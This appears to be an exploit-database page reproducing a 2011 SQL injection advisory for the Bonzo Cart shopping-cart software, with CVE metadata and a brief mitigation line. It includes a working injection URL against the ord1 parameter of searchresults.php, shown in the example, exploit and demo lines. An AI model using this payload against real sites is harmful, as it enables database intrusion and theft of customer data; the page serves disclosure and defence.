header-logo
Suggest Exploit
vendor:
Bonzo Cart
by:
Eyup CELIK
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Bonzo Cart
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: YES
Related CWE: CVE-2011-4010
CPE: a:turnkeycentral:bonzo_cart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2011

Bonzo Cart (E-Commerce System) SQL Injection

SQL Injection can be done using the command input. An example of this is searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName. A demo of this exploit can be seen at http://site.com/bonzacart/searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName.

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries and to validate user input.
Source

Exploit-DB raw data:

# Exploit Title: Bonzo Cart (E-Commerce System) SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.turnkeycentral.com
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

SQL Injection can be done using the command input

Example
searchresults.php?ord1=<SQL Injection  
Code>&ord2=asc&search1=&SearchTerm=&where=ItemName

Exploit:
searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName

Demo:
http://site.com/bonzacart/searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName

Navigation

Suggest Exploit

Services By CQR